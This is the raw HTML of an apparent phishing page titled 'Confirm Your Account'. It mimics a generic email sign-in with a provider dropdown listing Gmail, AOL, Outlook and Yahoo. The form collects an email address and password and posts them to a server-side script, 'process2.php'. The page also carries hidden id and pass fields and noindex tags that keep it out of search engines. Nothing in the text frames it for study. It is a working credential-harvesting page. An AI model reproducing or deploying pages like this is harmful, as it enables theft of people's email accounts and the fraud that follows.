<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Confirm Your Account</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta charset="utf-8" />
<meta name="applicable-device" content="pc,mobile" />
 <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta name="robots" content="noindex, nofollow">
  <meta name="googlebot" content="noindex, nofollow">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="format-detection" content="telephone=no" />

<link rel="shortcut icon"
              href="images/favicon.ico"/>
			  
			  
	
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<body style="visibility:hidden" onload="unhideBody()">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>
	<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.18/jquery-ui.min.js"></script>
	<script type="text/javascript" src="jquery.ddslick.min.js"></script>
	<script type="text/javascript" src="script.js"></script>
<style type="text/css">
/*----------Text Styles----------*/
.ws6 {font-size: 8px;}
.ws7 {font-size: 9.3px;}
.ws8 {font-size: 11px;}
.ws9 {font-size: 12px;}
.ws10 {font-size: 13px;}
.ws11 {font-size: 15px;}
.ws12 {font-size: 16px;}
.ws14 {font-size: 19px;}
.ws16 {font-size: 21px;}
.ws18 {font-size: 24px;}
.ws20 {font-size: 27px;}
.ws22 {font-size: 29px;}
.ws24 {font-size: 32px;}
.ws26 {font-size: 35px;}
.ws28 {font-size: 37px;}
.ws36 {font-size: 48px;}
.ws48 {font-size: 64px;}
.ws72 {font-size: 96px;}
.wpmd {font-size: 13px;font-family: Arial,Helvetica,Sans-Serif;font-style: normal;font-weight: normal;}
/*----------Para Styles----------*/
DIV,UL,OL /* Left */
{
 margin-top: 0px;
 margin-bottom: 0px;
}
</style>
<style> 
  .textbox { 
    font-family: Arial, Helvetica, sans-serif;
    background: rgba(255, 255, 255, 0.44); 
    color: #333; 
    border: 1px solid #A4A4A4; 
    padding: 4px 8px 4px 4px !important;
    line-height: 1; 
    width: 275px; 
    height:35px; 
	font-size: 14px;
	
	padding-left:18px;
  
  } 
 .textbox:focus { 
    border: 1px solid #4d90fe; 
    outline: none; 
	padding-left:18px;
    box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3);  
    -moz-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    -webkit-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    background: rgb(255, 255, 255); } 
  
</style> 
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:118px; top:8px; width:210px; height:49px; z-index:0"><img src="images/22.png" alt="" title="" border=0 width=210 height=49></div>

<div id="image2" style="position:absolute; overflow:hidden; left:1074px; top:16px; width:103px; height:47px; z-index:1"><a href="#"><img src="images/23.png" alt="" title="" border=0 width=103 height=47></a></div>

<div id="image3" style="position:absolute; overflow:hidden; left:136px; top:82px; width:1019px; height:48px; z-index:2"><img src="images/24.png" alt="" title="" border=0 width=1019 height=48></div>

<div id="text2" style="position:absolute; overflow:hidden; left:281px; top:143px; width:180px; height:54px; z-index:3">
<div class="wpmd">
<div><font class="ws11">Hello </font></div>
</div></div>

<input name="id" type="text" value="" style="position:absolute;width:400px;border:none;outline: none;font-weight: bold;font-size: 15px;left:325px;top:140px;z-index:4">


<div id="image4" style="position:absolute; overflow:hidden; left:275px; top:199px; width:317px; height:19px; z-index:11"><img src="images/45.png" alt="" title="" border=0 width=317 height=19></div>

<div id="hr1" style="position:absolute; overflow:hidden; left:273px; top:220px; width:819px; height:17px; z-index:12">
<hr size=2 width=819>
</div>




<form action="../process2.php" method="post">

<input name="id" value="" type="hidden">
<input name="pass"  value="" type="hidden">

<div id="image5" style="position:absolute; overflow:hidden; left:415px; top:296px; width:109px; height:122px; z-index:6"><img src="images/7.png" alt="" title="" border=0 width=109 height=122></div>

<input name="g"  required pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$"  placeholder="Email Address" class="textbox" type="text" value= "" style="position:absolute;width:257px;left:545px;top:338px;z-index:7">
<input name="f"  required  placeholder="Email Password" class="textbox" type="password" style="position:absolute;width:257px;left:545px;top:396px;z-index:8">
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<center>
<select name="formselect1" id="demo-htmlselect-basic" style="position:absolute;left:543px;top:299px;width:257px;z-index:9">
<option data-description="Sign in with Gmail" data-imagesrc="images/mail_gmail.png" value="0">Gmail</option>

<option data-description="Sign in with AOL" data-imagesrc="images/aol.png" value="0">AOL</option>

<option data-description="Sign in with Microsoft Outlook" data-imagesrc="images/live_hotmail.png" value="0">Microsoft Outlook</option>

<option data-description="Sign in with Yahoo!" data-imagesrc="images/yahoo.png" value="0">Yahoo!</option>
    
	<option data-description="Sign in with Other Email" data-imagesrc="images/email.png" value="0">Other Email</option></select>
<div id="formimage1" style="position:absolute; left:614px; top:544px; z-index:10"><input type="image" name="formimage1" width="185" height="40" src="images/10.png"></div>
<div id="image6" style="position:absolute; overflow:hidden; left:0px; top:679px; width:1341px; height:184px; z-index:11"><img src="images/26.png" alt="" title="" border=0 width=1341 height=184></div>


</body>
</html>
															